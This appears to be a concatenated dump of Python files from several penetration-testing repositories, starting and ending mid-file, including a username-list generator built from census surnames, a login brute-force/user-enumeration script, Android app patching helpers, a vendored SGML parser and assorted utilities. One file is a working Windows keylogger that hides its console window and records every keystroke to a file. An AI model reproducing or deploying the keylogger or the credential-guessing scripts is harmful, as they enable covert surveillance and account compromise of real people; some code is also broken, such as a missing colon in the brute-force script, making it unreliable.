the following disclaimer. * Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution. * Neither the
name of the nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL CHRISTOPHER DUFFY BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
'''
import sys
from collections import namedtuple
import string
import argparse
import os
try:
import xlrd
except:
sys.exit("[!] Please install the xlrd library: pip install xlrd")
def unique_list(list_sort, verbose):
noted = []
if verbose > 0:
print("[*] Removing duplicates while maintaining order")
[noted.append(item) for item in list_sort if not noted.count(item)] # List comprehension
return noted
def census_parser(filename, verbose):
# Create the named tuple
CensusTuple = namedtuple('Census', 'name, rank, count, prop100k, cum_prop100k, pctwhite, pctblack, pctapi, pctaian, pct2prace, pcthispanic')
# Define the location of the file and worksheet till arguments are developed
worksheet_name = "top1000"
#Define work book and work sheet variables
workbook = xlrd.open_workbook(filename)
spreadsheet = workbook.sheet_by_name(worksheet_name)
total_rows = spreadsheet.nrows - 1
current_row = -1
# Define holder for details
username_dict = {}
surname_dict = {}
alphabet = list(string.ascii_lowercase)
while current_row < total_rows:
row = spreadsheet.row(current_row)
current_row += 1
entry = CensusTuple(*tuple(row)) #Passing the values of the row as a tuple into the namedtuple
surname_dict[entry.rank] = entry
cellname = entry.name
cellrank = entry.rank
for letter in alphabet:
if "." not in str(cellrank.value):
if verbose > 1:
print("[-] Eliminating table headers")
break
username = letter + str(cellname.value.lower())
rank = str(cellrank.value)
username_dict[username] = rank
username_list = sorted(username_dict, key=lambda key: username_dict[key])
return(surname_dict, username_dict, username_list)
def username_file_parser(prepend_file, append_file, verbose):
if prepend_file:
put_where = "begin"
filename = prepend_file
elif append_file:
put_where = "end"
filename = append_file
else:
sys.exit("[!] There was an error in processing the supplemental username list!")
with open(filename) as file:
lines = [line.rstrip('\n') for line in file]
if verbose > 1:
if "end" in put_where:
print("[*] Appending %d entries to the username list") % (len(lines))
else:
print("[*] Prepending %d entries to the username list") % (len(lines))
return(lines, put_where)
def combine_usernames(supplemental_list, put_where, username_list, verbose):
if "begin" in put_where:
username_list[:0] = supplemental_list #Prepend with a slice
if "end" in put_where:
username_list.extend(supplemental_list)
username_list = unique_list(username_list, verbose)
return(username_list)
def write_username_file(username_list, filename, domain, verbose):
open(filename, 'w').close() #Delete contents of file name
if domain:
domain_filename = filename + "_" + domain
email_list = []
open(domain_filename, 'w').close()
if verbose > 1:
print("[*] Writing to %s") % (filename)
with open(filename, 'w') as file:
file.write('\n'.join(username_list))
if domain:
if verbose > 1:
print("[*] Writing domain supported list to %s") % (domain_filename)
for line in username_list:
email_address = line + "@" + domain
email_list.append(email_address)
with open(domain_filename, 'w') as file:
file.write('\n'.join(email_list))
return
if __name__ == '__main__':
# If script is executed at the CLI
usage = '''usage: %(prog)s [-c census.xlsx] [-f output_filename] [-a append_filename] [-p prepend_filename] [-d domain_name] -q -v -vv -vvv'''
parser = argparse.ArgumentParser(usage=usage)
parser.add_argument("-c", "--census", type=str, help="The census file that will be used to create usernames, this can be retrieved like so:\n wget http://www2.census.gov/topics/genealogy/2000surnames/Top1000.xls", action="store", dest="census_file")
parser.add_argument("-f", "--filename", type=str, help="Filename for output the usernames", action="store", dest="filename")
parser.add_argument("-a","--append", type=str, action="store", help="A username list to append to the list generated from the census", dest="append_file")
parser.add_argument("-p","--prepend", type=str, action="store", help="A username list to prepend to the list generated from the census", dest="prepend_file")
parser.add_argument("-d","--domain", type=str, action="store", help="The domain to append to usernames", dest="domain_name")
parser.add_argument("-v", action="count", dest="verbose", default=1, help="Verbosity level, defaults to one, this outputs each command and result")
parser.add_argument("-q", action="store_const", dest="verbose", const=0, help="Sets the results to be quiet")
parser.add_argument('--version', action='version', version='%(prog)s 0.42b')
args = parser.parse_args()
# Set Constructors
census_file = args.census_file # Census
filename = args.filename # Filename for outputs
verbose = args.verbose # Verbosity level
append_file = args.append_file # Filename for the appending usernames to the output file
prepend_file = args.prepend_file # Filename to prepend to the usernames to the output file
domain_name = args.domain_name # The name of the domain to be appended to the username list
dir = os.getcwd() # Get current working directory
# Argument Validator
if len(sys.argv)==1:
parser.print_help()
sys.exit(1)
if append_file and prepend_file:
sys.exit("[!] Please select either prepend or append for a file not both")
if not filename:
if os.name != "nt":
filename = dir + "/census_username_list"
else:
filename = dir + "\\census_username_list"
else:
if filename:
if "\\" or "/" in filename:
if verbose > 1:
print("[*] Using filename: %s") % (filename)
else:
if os.name != "nt":
filename = dir + "/" + filename
else:
filename = dir + "\\" + filename
if verbose > 1:
print("[*] Using filename: %s") % (filename)
# Define working variables
sur_dict = {}
user_dict = {}
user_list = []
sup_username = []
target = []
combined_users = []
# Process census file
if not census_file:
sys.exit("[!] You did not provide a census file!")
else:
sur_dict, user_dict, user_list = census_parser(census_file, verbose)
# Process supplemental username file
if append_file or prepend_file:
sup_username, target = username_file_parser(prepend_file, append_file, verbose)
combined_users = combine_usernames(sup_username, target, user_list, verbose)
else:
combined_users = user_list
write_username_file(combined_users, filename, domain_name, verbose)
| 43.00995 | 253 | 0.660373 |
PenTestScripts | #!/usr/bin/env python
import win32console
import win32gui
import pythoncom
import pyHook
# This is completely based off the code at this URL (with very minor mods)
# https://github.com/blaz1988/keylogger/blob/master/keylogger.py
win=win32console.GetConsoleWindow()
win32gui.ShowWindow(win,0)
def OnKeyboardEvent(event):
if event.Ascii==5:
_exit(1)
if event.Ascii !=0 or 8:
f=open('C:\Users\Christopher\Downloads\output.txt','r+')
buffer=f.read()
f.close()
f=open('C:\Users\Christopher\Downloads\output.txt','w')
keylogs=chr(event.Ascii)
if event.Ascii==13:
keylogs='/n'
buffer+=keylogs
f.write(buffer)
f.close()
f1 = open('C:\Users\Christopher\Downloads\output.txt', 'w')
f1.write('Incoming keys:\n')
f1.close()
hm=pyHook.HookManager()
hm.KeyDown=OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()
| 25.764706 | 74 | 0.673267 |
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-10
# @File : mongo_db.py
# @Desc : ""
from flask import Flask
from pymongo import MongoClient
from instance import config
ProductionConfig = config.ProductionConfig
app = Flask(__name__)
app.config.from_object(ProductionConfig)
db_host = app.config.get('DB_HOST')
db_port = app.config.get('DB_PORT')
db_username = app.config.get('DB_USERNAME')
db_password = app.config.get('DB_PASSWORD')
db_name = app.config.get('DB_NAME')
def connectiondb(collection):
client = MongoClient(db_host, db_port)
db = client[db_name]
db.authenticate(db_username, db_password)
dbcollection = db[collection]
return dbcollection
def db_management(command):
client = MongoClient(db_host, db_port)
db = client[db_name]
db.authenticate(db_username, db_password)
if command == 'collection_names':
result = db.collection_names()
return result
def db_name_conf():
asset_db = app.config.get('ASSET_DB')
tasks_db = app.config.get('TASKS_DB')
vul_db = app.config.get('VULNERABILITY_DB')
plugin_db = app.config.get('PLUGIN_DB')
config_db = app.config.get('CONFIG_DB')
server_db = app.config.get('SERVER_DB')
subdomain_db = app.config.get('SUBDOMAIN_DB')
domain_db = app.config.get('DOMAIN_DB')
weekpasswd_db = app.config.get('WEEKPASSWD_DB')
port_db = app.config.get('PORT_DB')
auth_db = app.config.get('AUTH_DB')
search_db = app.config.get('SEARCH_DB')
acunetix_db = app.config.get('ACUNETIX_DB')
db_name_dict = {
'asset_db': asset_db,
'tasks_db': tasks_db,
'vul_db': vul_db,
'plugin_db': plugin_db,
'config_db': config_db,
'server_db': server_db,
'subdomain_db': subdomain_db,
'domain_db': domain_db,
'weekpasswd_db': weekpasswd_db,
'port_db': port_db,
'auth_db': auth_db,
'search_db': search_db,
'acunetix_db': acunetix_db,
}
return db_name_dict
if __name__ == "__main__":
print db_management('collection_names')
| 27.917808 | 51 | 0.627488 |
Python-Penetration-Testing-for-Developers | #brute force passwords
import sys
import urllib
import urllib2
if len(sys.argv) !=3:
print "usage: %s userlist passwordlist" % (sys.argv[0])
sys.exit(0)
filename1=str(sys.argv[1])
filename2=str(sys.argv[2])
userlist = open(filename1,'r')
passwordlist = open(filename2,'r')
url = "http://www.vulnerablesite.com/login.html"
foundusers = []
UnknownStr="Username not found"
for user in userlist:
for password in passwordlist:
data = urllib.urlencode({"username":user})
request = urllib2.urlopen(url,data)
response = request.read()
if(response.find(UnknownStr)>=0)
foundusers.append(user)
request.close()
if len(foundusers)>0:
print "Found Users:\n"
for name in foundusers:
print name+"\n"
else:
print "No users found\n"
| 21.029412 | 59 | 0.712567 |
Broken-Droid-Factory | import os
import random
import re
import randomword
class patcher():
'''
An interface to be inherited by other patchers, including shared features.
All patchers should also have a difficulty and a patch function (patch functions should return a string detailing what they did).
'''
name = None
difficulty = None
working_dir = None
is_verbose = False
def _get_path_to_file(self, file_name_to_find, dir_to_start_search=None):
if dir_to_start_search == None:
dir_to_start_search = self.working_dir
for subdir, dirs, files in os.walk(dir_to_start_search):
for file in files:
file_path = str(os.path.join(subdir, file))
if file == file_name_to_find:
return file_path
def _add_java_code_to_file(self, path_to_file, code_to_add_as_string,
line_to_add_after='''setContentView(R.layout.activity_main);'''):
lines = None
with open(path_to_file, "r") as file:
lines = file.readlines()
line_to_add_to = 0
for line in lines:
if line_to_add_after in line:
line_to_add_to = line_to_add_to + 1
break
line_to_add_to = line_to_add_to + 1
new_data_as_list = [code_to_add_as_string]
lines_to_write = lines[:line_to_add_to] + ["\n"] + new_data_as_list + ["\n"] + lines[line_to_add_to:]
with open(path_to_file, "w") as file:
file.writelines(lines_to_write)
def _add_imports_to_java_file(self, path_to_java_file, import_as_string):
lines = None
with open(path_to_java_file, "r") as file:
lines = file.readlines()
found_import = False
for line in lines:
if import_as_string in line:
found_import = True
if not found_import:
new_data_as_list = [import_as_string]
lines_to_write = [lines[0]] + ["\n"] + new_data_as_list + ["\n"] + lines[1:]
with open(path_to_java_file, "w") as file:
file.writelines(lines_to_write)
def _get_random_java_code_block(self):
var_one_identifier = "{}{}".format(str(randomword.get_random_word()).capitalize(), random.randint(0, 1000))
reflection_code_block = ['''import android.util.Log;import java.lang.reflect.Method;''',
'''Method[] methods{} = this.getClass().getDeclaredMethods();
for (Method method : methods{}) {{
Log.v("{}", method.getName());
}}'''.format(var_one_identifier, var_one_identifier, randomword.get_random_word())]
log_code_block = ['''import android.util.Log;''',
'Log.{}("{}","{}");'.format(random.choice(["d", "e", "i", "v", "wtf"]),
randomword.get_random_word(), randomword.get_random_word())]
toast_code_block = ['''import android.widget.Toast;''',
'''Toast.makeText(getApplicationContext(),"{}",Toast.{}).show();'''.format(
randomword.get_random_word(), random.choice(["LENGTH_SHORT", "LENGTH_LONG"]))]
intent_code_block = ['''import android.content.Intent;''', '''Intent launchIntent{} = getPackageManager().getLaunchIntentForPackage("com.android.chrome");
startActivity(launchIntent{});'''.format(var_one_identifier, var_one_identifier)]
code_blocks = [reflection_code_block, log_code_block, toast_code_block, intent_code_block]
return random.choice(code_blocks)
def get_all_current_components_from_activity_path(self, path_to_activity=None):
if path_to_activity == None:
path_to_activity = os.path.join(self.working_dir, "app", "src", "main", "res", "layout",
"activity_main.xml")
activiy_file = open(path_to_activity, "r")
activity_data = activiy_file.read()
activiy_file.close()
ids = re.findall(r'@\+id/(.+)', activity_data)
return ids
def logger(self, string_to_print):
if self.is_verbose:
print(string_to_print)
def _generate_activity_xml(self, activity_name="MainActivity"):
number_of_elements = random.randint(1, 10)
string_builder = '''<?xml version="1.0" encoding="utf-8"?>
<androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:app="http://schemas.android.com/apk/res-auto"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context=".{}">'''.format(activity_name)
for iterator in range(0, number_of_elements):
string_builder = string_builder + "\n\n{}".format(self._generate_random_xml_activity_component())
string_builder = string_builder + "\n\n</androidx.constraintlayout.widget.ConstraintLayout>"
return string_builder
def _generate_random_xml_activity_component(self, id=None):
if id == None:
id = randomword.get_random_word() + str(random.randint(24, 400))
text_view_xml = '''<TextView
android:id="@+id/textView{}"
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:text="{}"
android:textSize="{}sp"
app:layout_constraintBottom_toBottomOf="parent"
app:layout_constraintEnd_toEndOf="parent"
app:layout_constraintStart_toStartOf="parent"
app:layout_constraintTop_toTopOf="parent" />'''.format(id, randomword.get_random_word(),
random.randint(24, 400))
button_view_xml = '''<Button
android:id="@+id/button{}"
android:layout_width="{}dp"
android:layout_height="{}dp"
android:layout_marginTop="{}dp"
android:text="{}"
app:layout_constraintEnd_toEndOf="parent"
app:layout_constraintHorizontal_bias="0.542"
app:layout_constraintStart_toStartOf="parent"
app:layout_constraintTop_toTopOf="parent" />'''.format(id, random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400),
randomword.get_random_word())
image_view_xml = '''<ImageView
android:id="@+id/imageView{}"
android:layout_width="{}dp"
android:layout_height="{}dp"
android:layout_marginEnd="{}dp"
android:layout_marginBottom="{}dp"
app:layout_constraintBottom_toTopOf="parent"
app:layout_constraintEnd_toEndOf="parent"
app:srcCompat="@drawable/ic_launcher_foreground" />'''.format(id, random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400))
edit_text_view_xml = '''<EditText
android:id="@+id/editTextTextPersonName{}"
android:layout_width="{}dp"
android:layout_height="{}dp"
android:layout_marginTop="{}dp"
android:layout_marginBottom="{}dp"
android:ems="10"
android:inputType="textPersonName"
android:text="{}"
app:layout_constraintBottom_toTopOf="parent"
app:layout_constraintEnd_toEndOf="parent"
app:layout_constraintStart_toStartOf="parent"
app:layout_constraintTop_toTopOf="parent" />'''.format(id, random.randint(40, 400), random.randint(40, 400),
random.randint(40, 400),
random.randint(40, 400), randomword.get_random_word())
list_of_views = [text_view_xml, button_view_xml, image_view_xml, edit_text_view_xml]
return random.choice(list_of_views)
def _replace_everywhere(self, string_to_replace, new_string):
# To minimise conflicts these are done seperately
# Replace file content
for subdir, dirs, files in os.walk(self.working_dir):
for file in files:
file = str(os.path.join(subdir, file))
self._replace_in_file(file, string_to_replace, "{}".format(new_string))
# Rename files
for subdir, dirs, files in os.walk(self.working_dir):
for file in files:
file_path = str(os.path.join(subdir, file))
if string_to_replace in file:
os.rename(file_path, str(file).replace(string_to_replace, new_string))
# rename dirs
for subdir, dirs, files in os.walk(self.working_dir):
if string_to_replace in subdir:
name_to_replace = str(subdir).replace(string_to_replace, new_string)
os.rename(subdir, name_to_replace)
def _replace_in_file(self, file_path, string_to_remove, string_to_replace):
fin = open(file_path, "rt")
try:
data = fin.read()
except UnicodeDecodeError:
return
data = data.replace(string_to_remove, string_to_replace)
fin.close()
fin = open(file_path, "wt")
fin.write(data)
fin.close()
def __init__(self, name, working_dir, verbosity=False):
self.name = name
self.working_dir = working_dir
self.is_verbose = verbosity
def patch(self):
raise ("A patcher has been used that does not have an implemented patch function")
| 43.20354 | 162 | 0.553509 |
PenetrationTestingScripts | # Taken from Python 2.6.4 and regexp module constants modified
"""A parser for SGML, using the derived class as a static DTD."""
# XXX This only supports those SGML features used by HTML.
# XXX There should be a way to distinguish between PCDATA (parsed
# character data -- the normal case), RCDATA (replaceable character
# data -- only char and entity references and end tags are special)
# and CDATA (character data -- only end tags are special). RCDATA is
# not supported at all.
# from warnings import warnpy3k
# warnpy3k("the sgmllib module has been removed in Python 3.0",
# stacklevel=2)
# del warnpy3k
import markupbase
import re
__all__ = ["SGMLParser", "SGMLParseError"]
# Regular expressions used for parsing
interesting = re.compile('[&<]')
incomplete = re.compile('&([a-zA-Z][a-zA-Z0-9]*|#[0-9]*)?|'
'<([a-zA-Z][^<>]*|'
'/([a-zA-Z][^<>]*)?|'
'![^<>]*)?')
entityref = re.compile('&([a-zA-Z][-.a-zA-Z0-9]*)[^a-zA-Z0-9]')
# hack to fix http://bugs.python.org/issue803422
# charref = re.compile('&#([0-9]+)[^0-9]')
charref = re.compile("&#(x?[0-9a-fA-F]+)[^0-9a-fA-F]")
starttagopen = re.compile('<[>a-zA-Z]')
shorttagopen = re.compile('<[a-zA-Z][-.a-zA-Z0-9]*/')
shorttag = re.compile('<([a-zA-Z][-.a-zA-Z0-9]*)/([^/]*)/')
piclose = re.compile('>')
endbracket = re.compile('[<>]')
# hack moved from _beautifulsoup.py (bundled BeautifulSoup version 2)
#This code makes Beautiful Soup able to parse XML with namespaces
# tagfind = re.compile('[a-zA-Z][-_.a-zA-Z0-9]*')
tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
attrfind = re.compile(
r'\s*([a-zA-Z_][-:.a-zA-Z_0-9]*)(\s*=\s*'
r'(\'[^\']*\'|"[^"]*"|[][\-a-zA-Z0-9./,:;+*%?!&$\(\)_#=~\'"@]*))?')
class SGMLParseError(RuntimeError):
"""Exception raised for all parse errors."""
pass
# SGML parser base class -- find tags and call handler functions.
# Usage: p = SGMLParser(); p.feed(data); ...; p.close().
# The dtd is defined by deriving a class which defines methods
# with special names to handle tags: start_foo and end_foo to handle
# <foo> and </foo>, respectively, or do_foo to handle <foo> by itself.
# (Tags are converted to lower case for this purpose.) The data
# between tags is passed to the parser by calling self.handle_data()
# with some data as argument (the data may be split up in arbitrary
# chunks). Entity references are passed by calling
# self.handle_entityref() with the entity reference as argument.
class SGMLParser(markupbase.ParserBase):
# Definition of entities -- derived classes may override
entity_or_charref = re.compile('&(?:'
'([a-zA-Z][-.a-zA-Z0-9]*)|#([0-9]+)'
')(;?)')
def __init__(self, verbose=0):
"""Initialize and reset this instance."""
self.verbose = verbose
self.reset()
def reset(self):
"""Reset this instance. Loses all unprocessed data."""
self.__starttag_text = None
self.rawdata = ''
self.stack = []
self.lasttag = '???'
self.nomoretags = 0
self.literal = 0
markupbase.ParserBase.reset(self)
def setnomoretags(self):
"""Enter literal mode (CDATA) till EOF.
Intended for derived classes only.
"""
self.nomoretags = self.literal = 1
def setliteral(self, *args):
"""Enter literal mode (CDATA).
Intended for derived classes only.
"""
self.literal = 1
def feed(self, data):
"""Feed some data to the parser.
Call this as often as you want, with as little or as much text
as you want (may include '\n'). (This just saves the text,
all the processing is done by goahead().)
"""
self.rawdata = self.rawdata + data
self.goahead(0)
def close(self):
"""Handle the remaining data."""
self.goahead(1)
def error(self, message):
raise SGMLParseError(message)
# Internal -- handle data as far as reasonable. May leave state
# and data to be processed by a subsequent call. If 'end' is
# true, force handling all data as if followed by EOF marker.
def goahead(self, end):
rawdata = self.rawdata
i = 0
n = len(rawdata)
while i < n:
if self.nomoretags:
self.handle_data(rawdata[i:n])
i = n
break
match = interesting.search(rawdata, i)
if match: j = match.start()
else: j = n
if i < j:
self.handle_data(rawdata[i:j])
i = j
if i == n: break
if rawdata[i] == '<':
if starttagopen.match(rawdata, i):
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
k = self.parse_starttag(i)
if k < 0: break
i = k
continue
if rawdata.startswith("</", i):
k = self.parse_endtag(i)
if k < 0: break
i = k
self.literal = 0
continue
if self.literal:
if n > (i + 1):
self.handle_data("<")
i = i+1
else:
# incomplete
break
continue
if rawdata.startswith("<!--", i):
# Strictly speaking, a comment is --.*--
# within a declaration tag <!...>.
# This should be removed,
# and comments handled only in parse_declaration.
k = self.parse_comment(i)
if k < 0: break
i = k
continue
if rawdata.startswith("<?", i):
k = self.parse_pi(i)
if k < 0: break
i = i+k
continue
if rawdata.startswith("<!", i):
# This is some sort of declaration; in "HTML as
# deployed," this should only be the document type
# declaration ("<!DOCTYPE html...>").
k = self.parse_declaration(i)
if k < 0: break
i = k
continue
elif rawdata[i] == '&':
if self.literal:
self.handle_data(rawdata[i])
i = i+1
continue
match = charref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_charref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
match = entityref.match(rawdata, i)
if match:
name = match.group(1)
self.handle_entityref(name)
i = match.end(0)
if rawdata[i-1] != ';': i = i-1
continue
else:
self.error('neither < nor & ??')
# We get here only if incomplete matches but
# nothing else
match = incomplete.match(rawdata, i)
if not match:
self.handle_data(rawdata[i])
i = i+1
continue
j = match.end(0)
if j == n:
break # Really incomplete
self.handle_data(rawdata[i:j])
i = j
# end while
if end and i < n:
self.handle_data(rawdata[i:n])
i = n
self.rawdata = rawdata[i:]
# XXX if end: check for empty stack
# Extensions for the DOCTYPE scanner:
_decl_otherchars = '='
# Internal -- parse processing instr, return length or -1 if not terminated
def parse_pi(self, i):
rawdata = self.rawdata
if rawdata[i:i+2] != '<?':
self.error('unexpected call to parse_pi()')
match = piclose.search(rawdata, i+2)
if not match:
return -1
j = match.start(0)
self.handle_pi(rawdata[i+2: j])
j = match.end(0)
return j-i
def get_starttag_text(self):
return self.__starttag_text
# Internal -- handle starttag, return length or -1 if not terminated
def parse_starttag(self, i):
self.__starttag_text = None
start_pos = i
rawdata = self.rawdata
if shorttagopen.match(rawdata, i):
# SGML shorthand: <tag/data/ == <tag>data</tag>
# XXX Can data contain &... (entity or char refs)?
# XXX Can data contain < or > (tag characters)?
# XXX Can there be whitespace before the first /?
match = shorttag.match(rawdata, i)
if not match:
return -1
tag, data = match.group(1, 2)
self.__starttag_text = '<%s/' % tag
tag = tag.lower()
k = match.end(0)
self.finish_shorttag(tag, data)
self.__starttag_text = rawdata[start_pos:match.end(1) + 1]
return k
# XXX The following should skip matching quotes (' or ")
# As a shortcut way to exit, this isn't so bad, but shouldn't
# be used to locate the actual end of the start tag since the
# < or > characters may be embedded in an attribute value.
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
if rawdata[i:i+2] == '<>':
# SGML shorthand: <> == <last open tag seen>
k = j
tag = self.lasttag
else:
match = tagfind.match(rawdata, i+1)
if not match:
self.error('unexpected call to parse_starttag')
k = match.end(0)
tag = rawdata[i+1:k].lower()
self.lasttag = tag
while k < j:
match = attrfind.match(rawdata, k)
if not match: break
attrname, rest, attrvalue = match.group(1, 2, 3)
if not rest:
attrvalue = attrname
else:
if (attrvalue[:1] == "'" == attrvalue[-1:] or
attrvalue[:1] == '"' == attrvalue[-1:]):
# strip quotes
attrvalue = attrvalue[1:-1]
attrvalue = self.entity_or_charref.sub(
self._convert_ref, attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = match.end(0)
if rawdata[j] == '>':
j = j+1
self.__starttag_text = rawdata[start_pos:j]
self.finish_starttag(tag, attrs)
return j
# Internal -- convert entity or character reference
def _convert_ref(self, match):
if match.group(2):
return self.convert_charref(match.group(2)) or \
'&#%s%s' % match.groups()[1:]
elif match.group(3):
return self.convert_entityref(match.group(1)) or \
'&%s;' % match.group(1)
else:
return '&%s' % match.group(1)
# Internal -- parse endtag
def parse_endtag(self, i):
rawdata = self.rawdata
match = endbracket.search(rawdata, i+1)
if not match:
return -1
j = match.start(0)
tag = rawdata[i+2:j].strip().lower()
if rawdata[j] == '>':
j = j+1
self.finish_endtag(tag)
return j
# Internal -- finish parsing of <tag/data/ (same as <tag>data</tag>)
def finish_shorttag(self, tag, data):
self.finish_starttag(tag, [])
self.handle_data(data)
self.finish_endtag(tag)
# Internal -- finish processing of start tag
# Return -1 for unknown tag, 0 for open-only tag, 1 for balanced tag
def finish_starttag(self, tag, attrs):
try:
method = getattr(self, 'start_' + tag)
except AttributeError:
try:
method = getattr(self, 'do_' + tag)
except AttributeError:
self.unknown_starttag(tag, attrs)
return -1
else:
self.handle_starttag(tag, method, attrs)
return 0
else:
self.stack.append(tag)
self.handle_starttag(tag, method, attrs)
return 1
# Internal -- finish processing of end tag
def finish_endtag(self, tag):
if not tag:
found = len(self.stack) - 1
if found < 0:
self.unknown_endtag(tag)
return
else:
if tag not in self.stack:
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
self.unknown_endtag(tag)
else:
self.report_unbalanced(tag)
return
found = len(self.stack)
for i in range(found):
if self.stack[i] == tag: found = i
while len(self.stack) > found:
tag = self.stack[-1]
try:
method = getattr(self, 'end_' + tag)
except AttributeError:
method = None
if method:
self.handle_endtag(tag, method)
else:
self.unknown_endtag(tag)
del self.stack[-1]
# Overridable -- handle start tag
def handle_starttag(self, tag, method, attrs):
method(attrs)
# Overridable -- handle end tag
def handle_endtag(self, tag, method):
method()
# Example -- report an unbalanced </...> tag.
def report_unbalanced(self, tag):
if self.verbose:
print '*** Unbalanced </' + tag + '>'
print '*** Stack:', self.stack
def convert_charref(self, name):
"""Convert character reference, may be overridden."""
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 127:
return
return self.convert_codepoint(n)
def convert_codepoint(self, codepoint):
return chr(codepoint)
def handle_charref(self, name):
"""Handle character reference, no need to override."""
replacement = self.convert_charref(name)
if replacement is None:
self.unknown_charref(name)
else:
self.handle_data(replacement)
# Definition of entities -- derived classes may override
entitydefs = \
{'lt': '<', 'gt': '>', 'amp': '&', 'quot': '"', 'apos': '\''}
def convert_entityref(self, name):
"""Convert entity references.
As an alternative to overriding this method; one can tailor the
results by setting up the self.entitydefs mapping appropriately.
"""
table = self.entitydefs
if name in table:
return table[name]
else:
return
def handle_entityref(self, name):
"""Handle entity references, no need to override."""
replacement = self.convert_entityref(name)
if replacement is None:
self.unknown_entityref(name)
else:
self.handle_data(replacement)
# Example -- handle data, should be overridden
def handle_data(self, data):
pass
# Example -- handle comment, could be overridden
def handle_comment(self, data):
pass
# Example -- handle declaration, could be overridden
def handle_decl(self, decl):
pass
# Example -- handle processing instruction, could be overridden
def handle_pi(self, data):
pass
# To be overridden -- handlers for unknown objects
def unknown_starttag(self, tag, attrs): pass
def unknown_endtag(self, tag): pass
def unknown_charref(self, ref): pass
def unknown_entityref(self, ref): pass
class TestSGMLParser(SGMLParser):
def __init__(self, verbose=0):
self.testdata = ""
SGMLParser.__init__(self, verbose)
def handle_data(self, data):
self.testdata = self.testdata + data
if len(repr(self.testdata)) >= 70:
self.flush()
def flush(self):
data = self.testdata
if data:
self.testdata = ""
print 'data:', repr(data)
def handle_comment(self, data):
self.flush()
r = repr(data)
if len(r) > 68:
r = r[:32] + '...' + r[-32:]
print 'comment:', r
def unknown_starttag(self, tag, attrs):
self.flush()
if not attrs:
print 'start tag: <' + tag + '>'
else:
print 'start tag: <' + tag,
for name, value in attrs:
print name + '=' + '"' + value + '"',
print '>'
def unknown_endtag(self, tag):
self.flush()
print 'end tag: </' + tag + '>'
def unknown_entityref(self, ref):
self.flush()
print '*** unknown entity ref: &' + ref + ';'
def unknown_charref(self, ref):
self.flush()
print '*** unknown char ref: &#' + ref + ';'
def unknown_decl(self, data):
self.flush()
print '*** unknown decl: [' + data + ']'
def close(self):
SGMLParser.close(self)
self.flush()
def test(args = None):
import sys
if args is None:
args = sys.argv[1:]
if args and args[0] == '-s':
args = args[1:]
klass = SGMLParser
else:
klass = TestSGMLParser
if args:
file = args[0]
else:
file = 'test.html'
if file == '-':
f = sys.stdin
else:
try:
f = open(file, 'r')
except IOError, msg:
print file, ":", msg
sys.exit(1)
data = f.read()
if f is not sys.stdin:
f.close()
x = klass()
for c in data:
x.feed(c)
x.close()
if __name__ == '__main__':
test()
| 31.5875 | 79 | 0.506795 |
owtf | """
owtf.models.test_group
~~~~~~~~~~~~~~~~~~~~~~
"""
from sqlalchemy import Column, Integer, String
from sqlalchemy.orm import relationship
from owtf.db.model_base import Model
class TestGroup(Model):
__tablename__ = "test_groups"
code = Column(String, primary_key=True)
group = Column(String) # web, network
descrip = Column(String)
hint = Column(String, nullable=True)
url = Column(String)
priority = Column(Integer)
plugins = relationship("Plugin")
@classmethod
def get_by_code(cls, session, code):
"""Get the test group based on plugin code
:param code: Plugin code
:type code: `str`
:return: Test group dict
:rtype: `dict`
"""
group = session.query(TestGroup).get(code)
return group.to_dict()
@classmethod
def get_all(cls, session):
"""Get all test groups from th DB
:return:
:rtype:
"""
test_groups = session.query(TestGroup).order_by(TestGroup.priority.desc()).all()
dict_list = []
for obj in test_groups:
dict_list.append(obj.to_dict())
return dict_list
| 23.723404 | 88 | 0.596899 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python3.5
a=22;b=44;c=55;d=None
if a and b and c and d:
print("Not printed")
else:
print('Remember and operator -> All must evaluate to True !')
if a == b:
print("A and B are equal")
else:
print("A and B are not equal ! But we saw how to use == :)")
print("\nLets use some Bit wise operators with condition statements :\n")
a=2;b=2;c=0
bit_wise=a & b & c
if bit_wise:
print("Bit wise and returned non zero %s"%bit_wise)
else:
print("Bit wise and returned zero : %s"%bit_wise)
bit_wise=a&b
if bit_wise:
print("Now Bit wise and returned non zero : %s"%bit_wise)
else:
print("Again Bit wise and returned zero : %s"%bit_wise)
bit_wise_or = a | c
if bit_wise_or:
print("BIt wise OR - Should return 2 -> %s"%bit_wise_or)
else:
